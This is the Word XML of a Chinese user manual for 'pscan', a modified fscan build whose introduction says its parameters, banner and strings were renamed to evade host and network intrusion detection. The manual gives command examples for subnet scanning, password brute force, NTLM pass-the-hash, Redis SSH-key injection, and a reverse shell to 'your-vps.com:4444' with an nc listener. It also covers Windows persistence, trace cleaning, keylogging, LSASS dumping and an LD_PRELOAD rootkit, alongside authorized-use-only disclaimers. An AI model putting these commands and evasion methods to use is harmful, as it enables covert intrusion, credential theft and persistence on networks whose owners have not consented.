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 Light" w:hAnsi="Calibri Light"/>
          <w:b/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>pscan 使用手册</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>内网综合扫描工具 — 红队行动版本 v2.1.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="320" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DEE2E8"/>
          <w:sz w:val="20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版本：2.2.0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生成日期：2026-08-10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平台：Windows x64</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="D03B3B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>⚠ 免责声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="D03B3B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>本工具仅面向合法授权的企业安全建设行为。使用前请确保已获得授权，</w:t>
        <w:br/>
        <w:t>符合当地法律法规，不对非授权目标扫描。作者不承担任何非法使用产生的后果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="320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B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[ 请在 Word 中右键此处 → 更新域 以生成目录 ]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>pscan 是基于 fscan v2.1.3-rc 修改的红队行动专用版本。功能与 fscan 基本一致，但对命令行参数名、Banner、模块路径、源码字符串等进行了全面混淆，以规避 HIDS（主机入侵检测系统）和流量检测设备的特征识别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>核心思路：fscan 作为一个知名开源工具，其命令行参数名（如 -h、-m、-user、-pwd）、Banner（ASCII Logo）、二进制文件中的模块路径等都可能被安全产品提取为检测特征。pscan 通过全面混淆这些特征，使安全产品无法通过简单的字符串匹配识别出"这是 fscan 在扫描"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>魔改说明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修改项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969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402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参数名全部混淆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所有命令行参数重命名（见对照表）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规避基于参数名的特征检测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Banner 静默</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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启动时不输出 fscan ASCII Logo 和版本信息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不在终端和日志中留下"fscan"字样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模块名更改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Go 模块路径改为 test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二进制文件中不包含 github.com/shadow1ng/fscan 路径字符串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源码字符串清理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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代码中不出现 fscan 相关特征字符串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strings 命令无法从二进制中提取到 fscan 相关文本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调试日志改名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调试日志文件名为 tsk_debug.log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落盘日志不暴露工具名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>与 fscan 的参数对照表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Note"/>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D03B3B"/>
        </w:pBdr>
        <w:ind w:left="567" w:right="284"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="856304"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>这是最重要的部分！pscan 的参数名与 fscan 完全不同。如果你已经熟悉 fscan，请仔细阅读下表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>目标相关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fscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc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pscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5386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目标主机 (IP/CIDR/域名)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-hf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-tf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主机列表文件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-eh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-et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排除主机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-ehf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-etf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排除主机文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>端口相关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fscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc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pscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5386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-tp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端口列表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-pf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-tpf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端口列表文件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-ep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-etp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排除端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>扫描与性能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fscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc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pscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5386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-st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扫描模式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-tn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端口扫描线程数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-time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-tm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超时时间(秒)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-mt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-mt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模块线程数（相同）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>凭据相关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fscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc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pscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5386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-user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-usr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用户名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-pwd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-pw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密码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-usera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-ua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额外用户名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-pwda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-pa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额外密码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-userf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-uf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用户名字典文件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-pwdf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-pf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密码字典文件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-upf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-up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用户名:密码对文件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-domain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-dm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域名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-sshkey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-sk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SSH私钥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-hash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-hv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哈希值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-hashf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-hf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哈希文件（注意：与 fscan 的 -hf 含义不同！）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Web 与输出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fscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc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pscan 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5386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-url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目标URL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-uf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-urlf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URL文件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-o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-out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输出文件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-f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-fmt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输出格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>未变化的参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>以下参数在 pscan 中保持不变：-ao, -np, -nobr, -nopoc, -noredis, -full, -silent, -no, -nocolor, -nopg, -debug, -perf, -lang, -dns, -cookie, -num, -retry, -rate, -maxpkts, -icmp-rate, -proxy, -socks5, -iface, -local, -gt, -ntp, -max-redirect, -wt, -rf, -rs, -rsh, -rwp, -rwc, -rwf, -sc, -fsh-port, -start-socks5, -persistence-file, -win-pe, -download-url, -download-path, -keylog-output, -log, -pocname, -pocpath。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>完整参数表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>目标参数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08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目标主机: IP, 网段(CIDR), 域名 (必填)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主机列表文件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-tp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端口，默认约140个常用端口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-tpf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端口列表文件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排除主机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-etf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排除主机文件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-etp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排除端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>扫描控制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5669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all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扫描模式: all, icmp, portscan 或指定插件名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-ao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仅存活探测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600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端口扫描线程数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-mt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20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模块线程数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-tm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3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超时时间（秒）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-gt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180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全局超时（秒）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-np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禁用 Ping 探测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-ntp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禁用 TCP 补充探测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-rate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0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每分钟最大发包数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-maxpkts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0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最大发包总数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-icmp-rate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float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0.1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ICMP 发包速率</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>凭据参数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08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-usr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用户名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-pw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密码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-ua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额外用户名 (逗号或空格分隔)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-pa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额外密码 (逗号或空格分隔)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-uf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用户名字典文件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密码字典文件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-up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用户名:密码对文件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-dm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域名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-sk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 私钥文件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哈希文件（注意：不是主机文件！）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-hv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哈希值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Note"/>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D03B3B"/>
        </w:pBdr>
        <w:ind w:left="567" w:right="284"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="856304"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>特别注意：pscan 中的 -hf 是哈希文件（hash file），而不是 fscan 中的主机文件（host file）。pscan 的主机文件参数是 -tf。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>使用场景与示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>内网扫描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全量扫描整个 C 段（最常用）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仅存活探测（快速定位在线主机）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192.168.1.0/24 -ao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扫描多个网段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192.168.1.0/24,10.10.0.0/16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扫描 IP 范围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192.168.1.1-100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排除特定主机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192.168.1.0/24 -et 192.168.1.1,192.168.1.254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从文件读取目标列表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-tf targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>端口与协议控制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扫描指定端口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192.168.1.0/24 -tp 22,80,443,3306,3389,6379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扫描全部端口（慢，谨慎使用，建议只对单台）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192.168.1.100 -tp 1-65535 -tn 1000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排除特定端口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192.168.1.0/24 -etp 445,139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跳过 Ping 探测（纯 TCP 扫描，适合禁 Ping 环境）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192.168.1.0/24 -np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限制发包速率（规避流量检测）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192.168.1.0/24 -rate 1000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>弱口令爆破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指定自定义凭据（注意是 -usr/-pw 不是 -user/-pwd）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192.168.1.0/24 -usr admin -pw admin123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使用字典文件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192.168.1.0/24 -uf users.txt -pf pass.txt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使用用户名:密码对文件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192.168.1.0/24 -up creds.txt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添加额外用户/密码（与原字典合并）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192.168.1.0/24 -ua root,admin -pa 123456,password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SSH 私钥登录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192.168.1.100 -sk id_rsa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NTLM 哈希传递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192.168.1.100 -hv "31d6cfe0d16ae931b73c59d7e0c089c0"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>后渗透利用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列出所有可用本地插件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-local list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收集系统信息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-local systeminfo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反弹 Shell（先在外网 VPS 监听: nc -lvnp 4444）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-local reverseshell -rsh your-vps.com:4444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启动 SOCKS5 代理（本地监听 1080，用于内网穿透）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-local socks5proxy -start-socks5 1080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杀软检测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-local avdetect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Redis 写公钥（注意模式参数是 -st 不是 -m）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192.168.1.100 -st redis -rs "ssh-rsa AAAAB3N..."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Windows 持久化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-local winstartup -win-pe C:\shell.exe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清理痕迹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-local cleaner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>输出控制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指定输出文件（注意是 -out 不是 -o）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192.168.1.0/24 -out scan-result.txt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JSON 格式输出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192.168.1.0/24 -fmt json -out result.json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静默 + 不保存（最隐蔽）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192.168.1.0/24 -silent -no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调试模式（日志写入 tsk_debug.log）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.\pscan.exe -t 192.168.1.0/24 -debug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>扫描模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过 -st 参数指定扫描模式：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765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all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默认，存活探测 + 端口扫描 + 服务识别 + 弱口令爆破 + POC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icmp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ICMP 存活探测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portscan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仅端口扫描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Redis 扫描 + 利用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SSH 扫描 + 爆破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mysql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MySQL 扫描 + 爆破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mssql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MSSQL 扫描 + 爆破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smb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SMB 扫描 + MS17-010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rdp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RDP 扫描 + 爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>支持的爆破服务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服务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插件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819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默认端口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22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FTP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ftp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Telnet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telnet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23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SMB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smb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445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RDP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rdp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3389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VNC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vnc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5900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MySQL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mysql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3306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MSSQL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mssql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1433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Oracle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oracle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1521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PostgreSQL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postgresql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5432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6379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MongoDB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mongodb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27017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Elasticsearch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elasticsearch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9200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Memcached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memcached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11211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LDAP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ldap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389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SMTP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smtp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25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POP3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pop3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110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IMAP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imap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143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SNMP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snmp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161(UDP)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Rsync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rsync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873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RabbitMQ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rabbitmq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5672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ActiveMQ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activemq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61616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Kafka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kafka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9092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Zookeeper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zookeeper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2181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Neo4j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neo4j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7687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Cassandra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cassandra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9042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MQTT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mqtt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1883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Modbus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modbus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502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NetBIOS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netbios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137-139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JDWP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jdwp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5005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>后渗透插件列表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过 -local 参数调用：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插件名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平台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systeminfo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系统信息收集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reverseshell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反弹 Shell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forwardshell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正向 Shell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socks5proxy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启动 SOCKS5 代理服务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keylogger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键盘记录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minidump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LSASS 凭据提取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sshkey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 公钥注入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Linux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cleaner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痕迹清理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crontask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Cron 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Linux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systemdservice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Systemd 服务持久化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Linux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ldpreload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LD_PRELOAD Rootkit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Linux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winregistry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注册表持久化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winschtask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计划任务持久化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winservice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服务持久化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winstartup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启动项持久化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winlogon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登录脚本持久化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winwmi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WMI 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winbits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BITS 任务持久化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winifeo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IFEO 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avdetect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杀软检测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download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文件下载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</w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>参考资料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• pscan GitHub 仓库：https://github.com/webzzaa/pscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• pscan-loader 配合项目：https://github.com/webzzaa/pscan-loader-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• fscan GitHub 官方仓库：https://github.com/shadow1ng/fscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="DEE2E8"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Note"/>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D03B3B"/>
        </w:pBdr>
        <w:ind w:left="567" w:right="284"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="856304"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>本工具是专业安全评估工具，请在获得合法授权的前提下使用。禁止对未授权目标进行扫描，使用者需自行承担所有法律责任。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5"/>
      </w:rPr>
      <w:t>pscan 使用手册</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="15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B7280"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="6B7280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56DB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56D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7A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har">
    <w:name w:val="CodeChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="333333"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Blockquote">
    <w:name w:val="Blockquote"/>
    <w:pPr>
      <w:spacing w:before="80" w:after="80"/>
      <w:ind w:left="567"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:i/>
      <w:color w:val="6B7280"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Note">
    <w:name w:val="Note"/>
    <w:pPr>
      <w:spacing w:before="80" w:after="80"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="856304"/>
      <w:sz w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC1">
    <w:name w:val="TOC 1"/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC2">
    <w:name w:val="TOC 2"/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC3">
    <w:name w:val="TOC 3"/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibr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